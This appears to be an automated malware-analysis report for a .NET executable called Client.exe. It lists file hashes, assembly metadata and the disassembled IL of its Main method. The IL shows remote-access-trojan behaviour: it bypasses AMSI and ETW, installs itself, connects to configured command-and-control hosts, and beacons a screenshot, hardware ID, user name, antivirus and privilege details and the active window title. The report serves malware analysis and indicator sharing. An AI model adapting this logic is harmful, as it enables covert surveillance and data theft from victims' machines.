44234153778ad917bf3cc03ce1b718e7
PE Executable | MD5: 44234153778ad917bf3cc03ce1b718e7 | Size: 195.61 KB | application/x-dosexec
Symbol Ofbuscation Score
|
Hash | Hash Value |
|---|---|
| MD5 | 44234153778ad917bf3cc03ce1b718e7
|
| Sha1 | ce918464f287cb15848a2988b51895e3439b4017
|
| Sha256 | 949bfd6736700f90d2cc422326d77fcf140d843b8054ff24812f286524a6a52c
|
| Sha384 | 19ad8b17e79ddec4ca1c51a06250d0de985cdf79f2d4418d59278529d01ed9eab4cf25d3672d907bb52c33d63aa0b5fc
|
| Sha512 | ed20b0315023b82068598ac2026b748dfdca1541c2af900fc7d53eca6d9ce62258f2f505744a6105d3930dca409dddb32168b5e85e96f337ec84d70b1986ee90
|
| SSDeep | 3072:nEHWw4OW6EsUmHWeE/IZZonz1ebGC8od/U6ePKd0DzPBdc5VeOblxrfrxJEGENfu:Pw4raULKZonBeVHKRDTU9bNl2c
|
| TLSH | A314F18877A88D62E77F89B9239182145372D2738440D38F3EDE5DD26B57BC29780EC6
|
PeID
|
Name0 | Value |
|---|---|
| Info | PE Detect: PeReader OK (file layout) |
| Module Name | Client.exe |
| Full Name | Client.exe |
| EntryPoint | System.Void Client.Program::Main(System.String[]) |
| Scope Name | Client.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v4.0.30319 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | Client |
| Assembly Version | 1.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | .NETFramework,Version=v4.0 |
| Total Strings | 290 |
| Main Method | System.Void Client.Program::Main(System.String[]) |
| Main IL Instruction Count | 149 |
| Main IL | call System.Void Client.Config::Init() call System.Void Client.Helper.AsmiAndETW::Bypass() ldsfld System.String Client.Config::Install ldstr gf*\ call System.String Client.Helper.EncryptString::Decode(System.String) call System.Boolean System.String::op_Equality(System.String,System.String) brfalse.s IL_0025: ldsfld System.String Client.Config::Mutex call System.Void Client.Helper.Install::Run() ldsfld System.String Client.Config::Mutex call System.Boolean Client.Helper.MutexControl::CreateMutex(System.String) brfalse IL_01A7: leave.s IL_01AC call System.Void Client.Helper.Methods::MaxPriority() call System.Void Client.Helper.Methods::PreventSleep() ldsfld Client.Helper.Client Client.Program::client ldfld System.Boolean Client.Helper.Client::itsConnect brtrue IL_0198: ldc.i4 200 ldsfld System.String Client.Config::Hosts ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 59 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.0 <null> ldloc.0 <null> ldsfld System.Random Client.Helper.Methods::random ldloc.0 <null> ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.1 <null> ldloc.1 <null> ldc.i4.1 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) stloc.2 <null> ldsfld Client.Helper.Client Client.Program::client callvirt System.Void Client.Helper.Client::Disconnect() ldsfld Client.Helper.Client Client.Program::client ldloc.1 <null> ldc.i4.0 <null> ldelem.ref <null> ldloc.2 <null> ldsfld System.Random Client.Helper.Methods::random ldloc.2 <null> ldlen <null> conv.i4 <null> callvirt System.Int32 System.Random::Next(System.Int32) ldelem.ref <null> callvirt System.Void Client.Helper.Client::Connect(System.String,System.String) ldsfld Client.Helper.Client Client.Program::client ldfld System.Boolean Client.Helper.Client::itsConnect brfalse IL_0198: ldc.i4 200 ldsfld Client.Helper.Client Client.Program::client ldsfld Client.Helper.Client Client.Program::client newobj System.Void Client.Helper.PingChecker::.ctor(Client.Helper.Client) stfld Client.Helper.PingChecker Client.Helper.Client::pingChecker ldsfld Client.Helper.Client Client.Program::client ldsfld Client.Helper.Client Client.Program::client newobj System.Void Client.Helper.LastPing::.ctor(Client.Helper.Client) stfld Client.Helper.LastPing Client.Helper.Client::lastPing ldsfld Client.Helper.Client Client.Program::client ldc.i4.s 14 newarr System.Object dup <null> ldc.i4.0 <null> ldstr Za \@g call System.String Client.Helper.EncryptString::Decode(System.String) stelem.ref <null> dup <null> ldc.i4.1 <null> call System.Byte[] Client.Helper.Methods::CaptureResizeReduceQuality() stelem.ref <null> dup <null> ldc.i4.2 <null> ldsfld System.String Client.Config::Group stelem.ref <null> dup <null> ldc.i4.3 <null> ldsfld System.String Client.Config::Hwid stelem.ref <null> dup <null> ldc.i4.4 <null> call System.String System.Environment::get_UserName() ldstr {#{ call System.String Client.Helper.EncryptString::Decode(System.String) call System.String System.Environment::get_MachineName() call System.String System.String::Concat(System.String,System.String,System.String) stelem.ref <null> dup <null> ldc.i4.5 <null> ldsfld System.String Client.Config::Camera stelem.ref <null> dup <null> ldc.i4.6 <null> ldsfld System.String Client.Config::Cpu stelem.ref <null> dup <null> ldc.i4.7 <null> ldsfld System.String Client.Config::Gpu stelem.ref <null> dup <null> ldc.i4.8 <null> ldsfld System.String Client.Config::WindowsVersion stelem.ref <null> dup <null> ldc.i4.s 9 ldsfld System.String Client.Config::AntiVirus stelem.ref <null> dup <null> ldc.i4.s 10 ldsfld System.String Client.Config::Version stelem.ref <null> dup <null> ldc.i4.s 11 ldsfld System.String Client.Config::DataInstall stelem.ref <null> dup <null> ldc.i4.s 12 ldsfld System.String Client.Config::Privilege stelem.ref <null> dup <null> ldc.i4.s 13 call System.String Client.Helper.Methods::GetActiveWindowTitle() stelem.ref <null> call System.Byte[] Leb128.LEB128::Write(System.Object[]) callvirt System.Void Client.Helper.Client::Send(System.Byte[]) ldc.i4 200 call System.Void System.Threading.Thread::Sleep(System.Int32) br IL_003E: ldsfld Client.Helper.Client Client.Program::client leave.s IL_01AC: ret pop <null> leave.s IL_01AC: ret ret <null> |